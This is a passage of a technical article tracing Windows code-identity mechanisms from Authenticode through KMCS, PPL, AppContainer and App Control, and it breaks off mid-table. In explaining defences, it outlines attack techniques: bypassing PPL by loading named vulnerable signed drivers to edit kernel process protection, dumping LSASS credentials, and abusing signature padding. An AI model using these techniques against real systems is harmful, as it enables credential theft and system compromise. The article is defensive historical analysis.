&lt;p&gt;&lt;em&gt;Timeline sources, in row order (Mermaid syntax does not permit inline tokens inside the timeline block; each event is independently cited in the surrounding prose as well):&lt;/em&gt; 1993 NT 3.1 [@custer-inside-nt]; 1996 Authenticode [@ms-news-1996-authenticode]; 2002 Trustworthy Computing memo [@cnet-gates-memo] [@theregister-tcm]; 2006 Vista x64 KMCS [@ms-kmcs]; 2010 Stuxnet [@symantec-stuxnet]; 2012 AppContainer [@ms-package-identity]; 2012 Flame MD5 collision [@ms-2718704] [@msrc-2718704]; 2013 Windows 8.1 PPL [@ionescu-ppl] [@ms-protected-processes]; 2015 Device Guard / WDAC [@ms-appcontrol]; 2019 ASUS ShadowHammer disclosed (operation 2018) [@securelist-shadowhammer]; 2020 Pluton announced [@learn-pluton]; 2022 Driver Block List default-on [@msft-driver-blocklist]; 2024 CrowdStrike outage [@ms-crowdstrike-blog] [@msft-crowdstrike-best-practices]; 2025 MVI 3.0 user-mode preview [@weston-2024] [@weston-2025].&lt;/p&gt;
&lt;p&gt;If user identity was easy, why did code identity take thirty-three years -- and where exactly did each generation break?&lt;/p&gt;
&lt;h2&gt;Why code had no name&lt;/h2&gt;
&lt;p&gt;Helen Custer&apos;s 1992 &lt;em&gt;Inside Windows NT&lt;/em&gt; opens its security chapter on a single principle: the user is the principal [@custer-inside-nt]. Every action the kernel arbitrates is attributable to a user account. The token that the kernel manufactures at logon carries a Security Identifier (SID) for the user, SIDs for each group the user belongs to, a privilege bitmap, and a set of impersonation flags. Every Discretionary Access Control List on every securable object is evaluated against that token [@ms-sids]. The kernel never asks what binary is running. It asks who is running it.&lt;/p&gt;

A variable-length value that uniquely identifies a security principal in Windows. Users, groups, computer accounts, and (later) packages and capabilities all receive SIDs. Until Windows 8, every SID encoded a *user* or *group*; AppContainer and Package SIDs (the `S-1-15-2-...` form) extended SIDs to name code instead.
&lt;p&gt;For 1993&apos;s threat model, the user-as-principal model was defensible. NT 3.1 lived on multi-user workstations in a trusted local-area network. The attacker the designers worried about was a malicious insider, a contractor with the wrong group membership, an admin who exceeded his authority. Code arrived on floppies and CDs from coworkers and shrink-wrapped vendors; nobody downloaded executables off the public internet, because for most of the world there was no public internet to download them from.Integrity levels (Low, Medium, High, System) were added later, in Vista (2006), and they are still attributes of the &lt;em&gt;token&lt;/em&gt;, not of the binary on disk. A Low-integrity Internet Explorer process and a Low-integrity Notepad receive the same write restrictions because their tokens carry the same Mandatory Integrity Control label, regardless of which binary loaded.&lt;/p&gt;
&lt;p&gt;Then came Internet Explorer 3.0 in August 1996 and ActiveX. Microsoft repositioned OLE/COM as a cross-internet component model and committed to letting any compliant ActiveX control execute inside the browser [@ms-news-1996-authenticode]. The decision was not casually made; it was the strategic foundation of Microsoft&apos;s bet on the web. But its consequence at the security layer was immediate and devastating.&lt;/p&gt;
&lt;p&gt;If Alice double-clicks a control on a web page, the operating system&apos;s question is &quot;who is running this?&quot; The answer is &quot;Alice.&quot; She is allowed to run anything she wants. The control does whatever it likes -- with her token, her files, her privileges, her network access. The user-as-principal model has no second axis to invoke.&lt;/p&gt;
&lt;p&gt;There was no theoretical fix at this layer. Alice did genuinely request the download. She did genuinely double-click. NT had no other principal to consult. The model was complete, internally consistent, and exactly wrong for the new threat surface.&lt;/p&gt;
&lt;p&gt;What was missing was a cryptographic, network-portable identity for the code itself, attached to the binary in a way nobody downstream could forge. If the kernel cannot see the code, who can put a name on it -- and how do we attach that name to a running PE?&lt;/p&gt;
&lt;h2&gt;The first naive attempt: Authenticode (1996)&lt;/h2&gt;
&lt;p&gt;On August 7, 1996, Microsoft and VeriSign jointly announced the first cryptographic answer Windows had ever offered to &quot;who is this code?&quot; The press release ran twenty-two paragraphs and named every design choice that the next thirty years of Windows code identity would inherit: an X.509 certificate issued by an external commercial Certificate Authority, a PKCS#7 SignedData blob attached directly to the binary, and verification at download or install time by Internet Explorer 3.0 [@ms-news-1996-authenticode].&lt;/p&gt;

A cryptographic format for binding a publisher&apos;s identity and a tamper-evident hash to a Portable Executable. The signature is stored in the PE Attribute Certificate Table as a PKCS#7 SignedData structure containing an X.509 certificate chain and a hash that excludes the checksum field, the certificate-table directory entry, and the certificate table itself. Authenticode names the *publisher*, not the code; this is the founding constraint the rest of the article is forced to work around.

The new Microsoft Authenticode technology uniquely identifies the publisher of a piece of software and provides assurance to end users that it has not been tampered with or modified. -- Microsoft press release, August 7, 1996 [@ms-news-1996-authenticode]
&lt;p&gt;That sentence is the founding promise of Windows code identity. Read it once and the rest of the article becomes inevitable. Authenticode promises two things. It identifies the publisher. It detects tampering. It does not promise that the publisher is trustworthy, that the publisher&apos;s key is uncompromised, or that the bytes it covers are safe to execute. Three decades of failure modes follow from exactly that scoping.&lt;/p&gt;
&lt;p&gt;The mechanism is precise enough to demand a diagram. SignTool computes a hash that deliberately skips three regions of the PE: the checksum field (which the loader recomputes), the certificate-table directory entry, and the certificate table itself. The signature does not have to sign the bytes of its own embedding [@ms-pe-format].&lt;/p&gt;
&lt;p&gt;It then forms a PKCS#7 SignedData structure [@rfc-2315] containing the hash, an algorithm identifier, the X.509 chain, and an optional RFC 3161 timestamp. That blob is appended to the certificate table. At verify time, &lt;code&gt;WinVerifyTrust&lt;/code&gt; recomputes the hash, walks the chain to a trusted root, and (if a timestamp is present) honours signatures that were valid as of the timestamped time even if the issuer has since revoked the certificate [@ms-cryptotools].&lt;/p&gt;

sequenceDiagram
    participant Dev as Developer
    participant Sign as SignTool
    participant PE as PE binary
    participant Win as WinVerifyTrust
    participant CA as CA / chain store
    Dev-&amp;gt;&amp;gt;Sign: signtool sign /a app.exe
    Sign-&amp;gt;&amp;gt;PE: hash bytes (skip checksum + cert table)
    Sign-&amp;gt;&amp;gt;PE: build PKCS#7 SignedData
    Sign-&amp;gt;&amp;gt;PE: append RFC 3161 timestamp
    Sign-&amp;gt;&amp;gt;PE: write into Attribute Cert Table
    Note over Win: at install / download time
    Win-&amp;gt;&amp;gt;PE: re-hash same byte ranges
    Win-&amp;gt;&amp;gt;PE: extract PKCS#7 SignedData
    Win-&amp;gt;&amp;gt;CA: verify X.509 chain to trusted root
    CA--&amp;gt;&amp;gt;Win: chain ok
    Win--&amp;gt;&amp;gt;Win: trust verdict (advisory pre-Vista)
&lt;p&gt;Three structural failure modes shipped on day one and still ship in 2026.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Userland was advisory.&lt;/strong&gt; A signed &lt;code&gt;.exe&lt;/code&gt; ran. An unsigned &lt;code&gt;.exe&lt;/code&gt; also ran. Internet Explorer would prompt the user with a publisher name, but the prompt was a UI feature, not a kernel gate. The signature was a credential offered for inspection, never a wall the loader refused to cross. Closing this gap took ten years for kernel code (Authenticode 1996 [@ms-news-1996-authenticode] -&amp;gt; KMCS, Vista 2006 [@ms-kmcs]) and nineteen years for managed user-mode policy (Authenticode 1996 [@ms-news-1996-authenticode] -&amp;gt; Device Guard, 2015 [@ms-appcontrol]). Unmanaged consumer Windows in 2026 still permits arbitrary unsigned &lt;code&gt;.exe&lt;/code&gt; to run if the user clicks through SmartScreen.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The signed hash did not cover the whole file.&lt;/strong&gt; This is CVE-2013-3900, disclosed by Microsoft on December 10, 2013 in security bulletin MS13-098 [@ms13-098]. The Authenticode hash skips the certificate-table region by design, and the verifier in &lt;code&gt;WinVerifyTrust&lt;/code&gt; did not constrain the size of the unsigned PKCS#7 blob. An attacker could append arbitrary unauthenticated bytes inside the &lt;code&gt;WIN_CERTIFICATE&lt;/code&gt; structure of an already-signed PE without invalidating the signature.&lt;/p&gt;
&lt;p&gt;The fix was a registry value, &lt;code&gt;EnableCertPaddingCheck=1&lt;/code&gt;, that turned on strict verification. Microsoft chose not to enable it by default. Twelve years later, the National Vulnerability Database still records the same scoping note: &quot;Microsoft does not plan to enforce the stricter verification behavior as a default functionality on supported releases of Microsoft Windows&quot; [@nvd-cve-2013-3900]. CISA added CVE-2013-3900 to its Known Exploited Vulnerabilities catalog on January 10, 2022 -- eight years after disclosure, because attackers were still abusing the unfixed default [@nvd-cve-2013-3900].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; CVE-2013-3900 is still default-off in 2026. On any Windows endpoint where strict signature verification matters, set &lt;code&gt;HKLM\Software\Microsoft\Cryptography\Wintrust\Config\EnableCertPaddingCheck=1&lt;/code&gt; (and the WOW6432Node mirror on 64-bit). Microsoft documents the change as opt-in by design [@msrc-cve-2013-3900].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Timestamped signatures survive revocation.&lt;/strong&gt; The trust evaluator in &lt;code&gt;WinVerifyTrust&lt;/code&gt; is told to trust signatures as of the timestamped instant, not as of now. Removing this property would invalidate large catalogs of legitimate, archived signed software whose signing certificates have since expired [@ms-cryptotools]. The same property is what let the Stuxnet drivers load on every Windows machine that received them, because Microsoft revoked the Realtek and JMicron certificates &lt;em&gt;after&lt;/em&gt; Stuxnet had already shipped.The architectural choice here is genuinely hard. Synchronous global revocation would break offline software install. Asynchronous revocation, the alternative Microsoft chose, lets pre-revocation signatures continue to verify forever. There is no third option inside the Authenticode design.&lt;/p&gt;
&lt;p&gt;Pull these three threads together and the first aha falls out. Authenticode names the &lt;em&gt;publisher&lt;/em&gt;, not the code. A signed binary is a credential, not a verdict. The signature proves the bytes came from a holder of the publisher&apos;s private key. It does not prove the publisher is trustworthy, that the publisher&apos;s key has not been stolen, or that the bytes are safe to execute. Every failure mode of the next twenty-five years lives in that gap.&lt;/p&gt;
&lt;p&gt;Six years of failure modes had to accumulate before Microsoft executive priorities caught up. On January 15, 2002, Bill Gates sent the &quot;Trustworthy Computing&quot; memo company-wide, declaring security a higher priority than features and freezing engineering work for security review across its Windows product line (with SDL processes later extended company-wide) [@cnet-gates-memo] [@theregister-tcm]. The memo did not specify a code-identity mechanism. It is in this story because every later code-identity primitive -- the Security Development Lifecycle&apos;s mandatory SignTool integration, the XP SP2 hardening pass that produced MOTW, and the Vista work that produced KMCS -- shipped under the executive cover the memo provided [@windows-internals-7e].&lt;/p&gt;
&lt;p&gt;If unsigned code still runs in userland, what makes us think the same primitive will work for a kernel driver -- where the wrong binary owns the operating system?&lt;/p&gt;
&lt;h2&gt;The first refusal: KMCS, EV, and the WHQL pipeline (Vista, 2006)&lt;/h2&gt;
&lt;p&gt;Vista x64 shipped in November 2006 as the first Windows release that &lt;em&gt;refuses to load unsigned kernel code&lt;/em&gt; [@ms-kmcs]. The refusal was uncompromising. The kernel loader and the Plug-and-Play manager call into &lt;code&gt;WinVerifyTrust&lt;/code&gt; for every driver image; if the chain does not terminate at one of a small set of Microsoft-trusted roots, &lt;code&gt;MmLoadSystemImage&lt;/code&gt; returns &lt;code&gt;STATUS_INVALID_IMAGE_HASH&lt;/code&gt; and the driver does not load.&lt;/p&gt;

The Vista-era policy that requires every kernel-mode driver to carry an Authenticode signature chained to a Microsoft-trusted root. From Windows 10 1607 onward (the August 2016 Anniversary Update), only drivers signed by Microsoft via the Hardware Developer Center are accepted on Secure-Boot systems; end-entity cross-signed certificates issued before July 29, 2015 are grandfathered for legacy devices [@ms-kmcs].
&lt;p&gt;The mechanism is a load-time gate. In 2026, Microsoft offers three signing tiers that all terminate at a Microsoft cross-signed cert: HLK-tested (the full Windows Hardware Lab Kit run, eligible for retail Windows Update distribution), attestation-signed (lighter-weight, EV cert plus Microsoft attestation key, no hardware testing), and preproduction (developer signing for pre-release Windows builds) [@learn-driver-signing-offerings] [@ms-attestation-signing]. Driver &lt;code&gt;.cat&lt;/code&gt; catalog files extend Authenticode coverage from a single PE to an entire driver package, including INF files and supporting executables [@learn-embedded-sig].&lt;/p&gt;
&lt;p&gt;EV certificates -- Extended Validation, with mandatory hardware-security-module key storage and audited issuance -- became the practical floor for kernel signing. The reason was not pedagogical. A Domain Validated Authenticode cert from a commodity CA in that era could be obtained cheaply, often with little more than a working email address. EV raised the cost and binding strength of the publisher claim by an order of magnitude.&lt;/p&gt;
&lt;p&gt;Then, on June 17, 2010, Sergey Ulasen of the Belarusian anti-virus vendor VirusBlokAda flagged a strange piece of malware on a customer machine in Iran. It had been signed [@wikipedia-stuxnet].&lt;/p&gt;
&lt;p&gt;The Stuxnet dropper carried two kernel drivers, &lt;code&gt;mrxnet.sys&lt;/code&gt; and &lt;code&gt;mrxcls.sys&lt;/code&gt;, signed with legitimate Authenticode certificates issued to Realtek Semiconductor and JMicron Technology -- two Taiwanese hardware vendors. Investigators concluded the private keys had been physically exfiltrated from the publishers&apos; Taiwanese offices. VeriSign revoked the Realtek certificate on July 16, 2010 (and the JMicron certificate shortly afterward); Microsoft issued advisories and pushed Windows CTL updates to propagate the revocation [@symantec-stuxnet]. While the certs were valid, Vista x64 KMCS happily loaded both drivers on every system it touched.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; KMCS verifies &lt;em&gt;who signed&lt;/em&gt;, never &lt;em&gt;whether the signed code is safe&lt;/em&gt;. Every kernel-mode-identity failure between 2010 and 2026 reduces to that single sentence.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Stuxnet certificates were not anomalies. The same failure shape -- valid Microsoft-rooted signature, on code the publisher did not intend to ship, on a healthy KMCS-enforcing kernel -- replays at predictable intervals.&lt;/p&gt;

The Flame espionage toolkit produced a *forged* Microsoft-rooted certificate by exploiting an MD5 chosen-prefix collision against Microsoft&apos;s Terminal Services Licensing Service, which still issued MD5-hash code-signing certificates years after MD5&apos;s brokenness was known. Microsoft Security Advisory 2718704 revoked three of its own intermediate CAs and emergency-deployed a new Untrusted Certificate Store mechanism through Windows Update [@ms-2718704] [@msrc-2718704]. The episode forced Microsoft to deprecate MD5 in code signing and led directly to the curation infrastructure the Driver Block List uses today.
&lt;p&gt;ASUS ShadowHammer in 2018, disclosed by Kaspersky in 2019, added a third variant. The attackers did not steal an HSM-bound key. They compromised ASUS&apos;s signing pipeline and got their backdoor signed by ASUS&apos;s &lt;em&gt;production&lt;/em&gt; signing key in the normal course of a normal release, distributed through ASUS Live Update [@securelist-shadowhammer]. Kaspersky&apos;s analysis recorded &quot;trojanized updaters were signed with legitimate certificates (eg: &apos;ASUSTeK Computer Inc.&apos;)&quot; and that &quot;over 57,000 Kaspersky users have downloaded and installed the backdoored version of ASUS Live Update.&quot; The trust root, the chain, the cert -- all valid. The bytes -- attacker-controlled.&lt;/p&gt;
&lt;p&gt;KMCS verified that a driver was signed, not that it was safe. Signing alone was not enough. But what was?&lt;/p&gt;
&lt;h2&gt;The second refusal: identity as a runtime attribute (PPL, 2013)&lt;/h2&gt;
&lt;p&gt;Until October 17, 2013, code identity gated &lt;em&gt;whether&lt;/em&gt; code could load. Windows 8.1 quietly shipped a structural shift: code identity now also gated &lt;em&gt;what one running process could do to another&lt;/em&gt; [@ionescu-ppl]. Alex Ionescu, then CrowdStrike&apos;s founding Chief Architect and previously a co-author of &lt;em&gt;Windows Internals&lt;/em&gt;, was the first person to publish a detailed external map of the new mechanism. The lineage runs back to Vista&apos;s 2006 Protected Process model, originally introduced as a DRM container for protected media playback; PPL is the security-grade descendant of that primitive, repurposed seven years later as a general-purpose process-protection mechanism [@windows-internals-7e].&lt;/p&gt;

A protection attribute attached to running processes that mediates inter-process access checks above and beyond the user-token DACL. PPL processes carry a *signer level* (in increasing order, roughly: `Authenticode`, `CodeGen`, `Antimalware`, `Lsa`, `Windows`, `WinTcb`, `WinSystem`). A process can open `PROCESS_VM_READ`, `PROCESS_VM_WRITE`, or `CREATE_THREAD` rights against another protected process only if its own signer level is greater than or equal to the target&apos;s [@ionescu-ppl] [@ms-protected-processes].
&lt;p&gt;The mechanism lives in the kernel&apos;s &lt;code&gt;EPROCESS&lt;/code&gt; object. When process A opens process B, the kernel calls into &lt;code&gt;RtlTestProtectedAccess&lt;/code&gt; (and downstream &lt;code&gt;PsTestProtectedProcessIncompatibility&lt;/code&gt;) before any DACL evaluation [@scrt-ppl-bypass]. If A&apos;s signer level is below B&apos;s, sensitive access masks are silently stripped from the returned handle. The classic effect: an attacker running with a SYSTEM token, holding &lt;code&gt;SeDebugPrivilege&lt;/code&gt;, calling &lt;code&gt;OpenProcess&lt;/code&gt; on LSASS, gets back a handle without &lt;code&gt;PROCESS_VM_READ&lt;/code&gt;. Mimikatz can no longer dump the LSASS process memory.&lt;/p&gt;
&lt;p&gt;The signer level itself is set by an Enhanced Key Usage extension on the Authenticode certificate Microsoft issues to the binary&apos;s publisher. Antimalware vendors receive a certificate carrying the &lt;code&gt;Antimalware&lt;/code&gt; EKU; only Microsoft-internal binaries carry &lt;code&gt;WinTcb&lt;/code&gt; [@itm4n-runasppl]. Identity, in this model, is an EKU OID baked into a Microsoft-issued Authenticode cert, attached to the binary, evaluated by the kernel at every cross-process access check.&lt;/p&gt;

flowchart TD
    A[WinSystem]
    B[WinTcb]
    C[Windows]
    D[Lsa]
    E[Antimalware]
    F[CodeGen]
    G[Authenticode]
    A --&amp;gt; B --&amp;gt; C --&amp;gt; D --&amp;gt; E --&amp;gt; F --&amp;gt; G
    H[&quot;Caller (signer level X)&quot;] -- &quot;OpenProcess(target T, signer Y)&quot; --&amp;gt; I{&quot;X &amp;gt;= Y ?&quot;}
    I -- yes --&amp;gt; J[&quot;full access mask&quot;]
    I -- no  --&amp;gt; K[&quot;VM_READ / VM_WRITE / CREATE_THREAD stripped&quot;]
&lt;p&gt;LSASS-as-PPL is the canonical demonstration of the mechanism in practice. Setting &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL=1&lt;/code&gt; causes the next boot&apos;s LSASS to start with &lt;code&gt;PsProtectedSignerLsa&lt;/code&gt;. From that moment, no process below the &lt;code&gt;Lsa&lt;/code&gt; signer level can read LSASS memory, regardless of the user account. Mimikatz still runs as code; its &lt;code&gt;OpenProcess(LSASS, PROCESS_VM_READ)&lt;/code&gt; call returns a handle with the read right stripped, and its memory dump fails with &lt;code&gt;STATUS_ACCESS_DENIED&lt;/code&gt; before it ever sees a credential blob [@itm4n-runasppl].The &lt;code&gt;RunAsPPL=1&lt;/code&gt; setting is mirrored into a UEFI variable on Secure Boot systems precisely so that an attacker with &lt;code&gt;HKLM\SYSTEM&lt;/code&gt; registry write but no firmware-level access cannot disable LSA Protection by editing the registry and rebooting. The UEFI mirror is checked before the registry value is read [@itm4n-runasppl].&lt;/p&gt;
&lt;p&gt;ELAM -- Early Launch Antimalware -- is the same idea applied to boot. An ELAM driver, signed with a Microsoft-issued antimalware certificate, runs before any third-party boot driver and gets to vote on which subsequent drivers are allowed to load [@learn-elam]. Signer level enters the boot chain at the earliest moment third-party code can enter the boot chain.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; PPL&apos;s invention is conceptual, not just mechanical. Code identity becomes a runtime ACL between two running processes, not merely a load-time gate. App Control, HVCI, and the Driver Block List all operate on this same conceptual frame: identity continuously evaluated, in context, while code is executing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;PPL was, and is, the right idea. It is also incomplete in two ways that drove every subsequent layer.&lt;/p&gt;
&lt;p&gt;The first gap is BYOVD -- Bring Your Own Vulnerable Driver. A signed-but-vulnerable driver such as &lt;code&gt;RTCore64.sys&lt;/code&gt; (shipped with MSI Afterburner), &lt;code&gt;Capcom.sys&lt;/code&gt; (shipped with the &lt;em&gt;Street Fighter V&lt;/em&gt; anti-cheat), or &lt;code&gt;gdrv.sys&lt;/code&gt; (shipped with Gigabyte motherboard utilities) gives any local administrator arbitrary kernel read/write through an IOCTL. Because these drivers are validly KMCS-signed, they load. From kernel mode, the attacker simply zeroes the &lt;code&gt;Protection&lt;/code&gt; byte in the target process&apos;s &lt;code&gt;EPROCESS&lt;/code&gt; structure, and PPL evaporates. The signing chain is sound. The signer level is correctly evaluated. The mechanism that decides which kernel code is allowed to &lt;em&gt;exist&lt;/em&gt; -- not just to be signed -- is what fails.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; PPL is bypassed not by attacking PPL itself but by editing &lt;code&gt;EPROCESS.Protection&lt;/code&gt; from kernel mode. That is exactly why the Driver Block List had to exist as a separate layer above KMCS [@msft-driver-blocklist].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The second gap is the user-mode side. PPLdump and PPLfault demonstrated that confused-deputy DLL loads inside higher-PPL services could be turned into an arbitrary memory read of LSASS. Microsoft eventually patched PPLdump in Windows 10 21H2 build 19044.1826, but the failure &lt;em&gt;class&lt;/em&gt; remains structural: trusting a higher-signer process to safely load DLLs from publisher-controlled paths is a foot-gun every time a new such service ships [@ppldump-github] [@scrt-ppl-bypass].&lt;/p&gt;
&lt;p&gt;If signer level is the principal for OS-internal processes, what is the principal for the next layer up -- the application?&lt;/p&gt;
&lt;h2&gt;The application becomes a principal: AppContainer and the Package SID&lt;/h2&gt;
&lt;p&gt;Two processes, same user, same machine. One can read the user&apos;s SSH private keys. The other cannot. Same token. Same DACLs on the file. Different verdict. That is the AppContainer promise [@ms-appcontainer-isolation], and to keep it the operating system needs a &lt;em&gt;cryptographic identity for the application itself&lt;/em&gt; -- something derived from the application, not from the user, that ACLs can name.&lt;/p&gt;
&lt;p&gt;Windows 8 shipped AppContainer in 2012. Internally it was called LowBox, the name surviving in the legacy documentation [@ms-appcontainer-legacy]. Windows 10 generalised the model into MSIX, the modern app-package format [@ms-msix].&lt;/p&gt;

AppContainer is a per-process sandbox that augments the user-token security check with an *AppContainer SID* (`S-1-15-2-...`) derived from the package identity of the running application. ACLs and capability claims (such as `internetClient` or `picturesLibrary`) are evaluated against this SID, not against the user. Two processes running as the same user can therefore receive different access verdicts because their AppContainer SIDs differ.
&lt;p&gt;The cryptographic move is in how the SID is built.&lt;/p&gt;

Every MSIX/APPX package is identified by a five-element tuple: `(Name, Version, Architecture, ResourceId, Publisher)` [@ms-package-identity]. The `Publisher` field is the X.509 subject Distinguished Name of the certificate that signed the package. A 13-character `PublisherId` is derived deterministically from the Publisher DN by Crockford-Base32 encoding the first 64 bits of a SHA-256 hash (per community reverse-engineering; Microsoft&apos;s public documentation does not confirm the specific algorithm). The *Package Family Name* is then `_`; the *AppContainer SID* is computed deterministically from the full identity tuple and slotted into the `S-1-15-2-...` namespace.
&lt;p&gt;The derivation is dense enough to deserve a worked example. &lt;code&gt;Microsoft Corporation&lt;/code&gt; plus the &lt;code&gt;Microsoft.WindowsCalculator&lt;/code&gt; package name yields &lt;code&gt;Microsoft.WindowsCalculator_8wekyb3d8bbwe&lt;/code&gt; -- the suffix is the Crockford-Base32 PublisherId of &lt;code&gt;Microsoft Corporation&lt;/code&gt;&apos;s subject DN [@ms-package-identity]. Every MSIX package whose Publisher DN matches will share that suffix; every package whose Publisher DN differs will have a different suffix; an attacker who does not hold the publisher&apos;s signing key cannot make a package masquerade as belonging to that publisher&apos;s family.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;async function publisherIdOf(publisherDN) {   const data = new TextEncoder().encode(publisherDN);   const digest = await crypto.subtle.digest(&apos;SHA-256&apos;, data);   const first8 = new Uint8Array(digest.slice(0, 8));   // Crockford Base32 alphabet (no I, L, O, U)   const alpha = &apos;0123456789abcdefghjkmnpqrstvwxyz&apos;;   let bits = 0n;   for (const b of first8) bits = (bits &amp;lt;&amp;lt; 8n) | BigInt(b);   let out = &apos;&apos;;   for (let i = 0; i &amp;lt; 13; i++) {     out = alpha[Number(bits &amp;amp; 31n)] + out;     bits &amp;gt;&amp;gt;= 5n;   }   return out; } const dn = &apos;CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US&apos;; publisherIdOf(dn).then(pid =&amp;gt; console.log(&apos;PFN suffix candidate:&apos;, pid)); console.log(&apos;Real PFN: Microsoft.WindowsCalculator_8wekyb3d8bbwe&apos;); console.log(&apos;Note: the real algorithm is documented in package-identity-overview; this snippet demonstrates the structure, not the exact hash.&apos;);&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;Capabilities sit at the same layer. When an MSIX manifest declares &lt;code&gt;&amp;lt;Capability Name=&quot;internetClient&quot; /&amp;gt;&lt;/code&gt;, the package is tagged at install time with a &lt;em&gt;capability SID&lt;/em&gt; of the form &lt;code&gt;S-1-15-3-1&lt;/code&gt;, and the Windows Filtering Platform evaluates outbound TCP connections against that SID, not against the user&apos;s [@p0-appcontainer]. Mandatory Integrity Control labels (Low/Medium/High) compose with the AppContainer SID rather than replacing it [@learn-mic]. A broker process running outside the AppContainer is the only path back to user-scoped resources, and the broker keys its trust decisions on the calling Package SID.&lt;/p&gt;

Windows Hello&apos;s biometric authentication broker is itself an MSIX-style protected service whose AppContainer-flavoured identity is the Package SID derived from its Microsoft-signed manifest. Other processes that want to ask Hello to verify a face or a fingerprint must talk to the broker, and the broker decides whether to honour the request based partly on the caller&apos;s package identity. The reason this matters is the same as the LSASS reason: the secret material the broker holds (the user&apos;s TPM-bound private key) needs a principal that an attacker holding a SYSTEM token cannot impersonate. User-SID equality is not enough. Package-SID equality is.
&lt;p&gt;The &lt;code&gt;8wekyb3d8bbwe&lt;/code&gt; suffix you see on Calculator, Edge, the Microsoft Store, and most other in-box apps is &lt;code&gt;Microsoft Corporation&lt;/code&gt;&apos;s PublisherId. Once you know what it is, you start seeing it everywhere -- it is the cryptographic fingerprint of &quot;Microsoft signed this package&quot; [@ms-package-identity].&lt;/p&gt;
&lt;p&gt;The aha is the same shape as the PPL aha but at the layer above. Two binaries running as the same user can be authorised differently because the Package SID is derived from the manifest publisher and the package cannot forge it. AppContainer is not a sandbox you opt into. It is a SID you have. Capability ACLs name that SID. The firewall keys on it. The MIC label composes with it. The broker checks it.&lt;/p&gt;
&lt;p&gt;The limits are also visible. AppContainer is opt-in for Win32 desktop apps that have not been packaged. Forshaw&apos;s 2021 Project Zero analysis of the AppContainer firewall identified loopback-exemption and namespace-isolation holes that Microsoft classified as WontFix [@p0-appcontainer]. Per-app sandbox identity solves the Modern-app problem; it does not solve the legacy Win32 problem. For that, the operating system needs a policy plane that names code in publisher vocabulary instead of path vocabulary.&lt;/p&gt;
&lt;p&gt;What does an enterprise admin do when the application refuses to be packaged at all?&lt;/p&gt;
&lt;h2&gt;The policy plane: AppLocker, App Control, and the publisher rule&lt;/h2&gt;
&lt;p&gt;Path-based whitelisting failed for the same reason path-based ACLs failed. Anything writeable can be planted. AppLocker, shipped in Windows 7 in 2009, still stays in the box for compatibility, but Microsoft&apos;s own documentation recommends App Control for Business -- the rebranded Windows Defender Application Control -- for new deployments [@ms-applocker] [@ms-appcontrol]. The change is not cosmetic. It is the difference between filename-as-identity and Authenticode-publisher-as-identity.&lt;/p&gt;

A Code Integrity policy mechanism that expresses allow and deny rules in Authenticode-publisher vocabulary. Policies are authored in XML, compiled to a binary `siPolicy.p7b`, and enforced by the Code Integrity engine at every PE load. With HVCI active, enforcement happens inside the Hyper-V-protected secure kernel, immune to a compromised NT kernel [@ms-appcontrol].
&lt;p&gt;The certificate-and-publisher rule levels run from strictest to broadest as &lt;code&gt;Hash &amp;gt; FileName &amp;gt; FilePath &amp;gt; FilePublisher &amp;gt; SignedVersion &amp;gt; LeafCertificate &amp;gt; Publisher &amp;gt; PcaCertificate&lt;/code&gt;, with a parallel WHQL-only family for kernel drivers ordered &lt;code&gt;WHQLFilePublisher &amp;gt; WHQLPublisher &amp;gt; WHQL&lt;/code&gt; [@ms-appcontrol]. &lt;code&gt;Hash&lt;/code&gt; is the strictest (this exact byte string); &lt;code&gt;PcaCertificate&lt;/code&gt; is the broadest signer-based level (anything signed under that intermediate CA). Microsoft documents &lt;code&gt;RootCertificate&lt;/code&gt; as not supported, and &lt;code&gt;FilePath&lt;/code&gt; -- available for user-mode binaries from Windows 10 1903 onward -- is path-based and so inherits the failure modes the publisher-rule model was designed to escape.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;LeafCertificate &amp;gt; Publisher&lt;/code&gt; adjacency is the subtle one. &lt;code&gt;LeafCertificate&lt;/code&gt; pins to one specific signing certificate, so a renewal under a new leaf cert no longer matches. &lt;code&gt;Publisher&lt;/code&gt; matches any certificate with the same PCA + leaf-CN combination, including future renewals. &lt;code&gt;LeafCertificate&lt;/code&gt; is the stricter of the two [@ms-appcontrol].&lt;/p&gt;
&lt;p&gt;The practical sweet spot is &lt;code&gt;FilePublisher&lt;/code&gt;. It binds an allow rule to the tuple &lt;code&gt;(certificate authority + leaf publisher CN + original filename + minimum version)&lt;/code&gt;. That tuple survives recompiles: a benign update from the same publisher under the same name, signed by the same key, with a higher version still passes. It does not survive tampering. Change the original filename in the resource section, change the publisher, change the leaf certificate, and the rule no longer matches.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Policy primitive&lt;/th&gt;
&lt;th&gt;Era&lt;/th&gt;
&lt;th&gt;Rule basis&lt;/th&gt;
&lt;th&gt;Kernel coverage&lt;/th&gt;
&lt;th&gt;Default state&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Software Restriction Policies (SRP)&lt;/td&gt;
&lt;td&gt;XP, 2001&lt;/td&gt;
&lt;td&gt;path / hash / certificate&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;unmanaged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AppLocker&lt;/td&gt;
&lt;td&gt;Windows 7 Enterprise, 2009&lt;/td&gt;
&lt;td&gt;path / publisher / hash&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
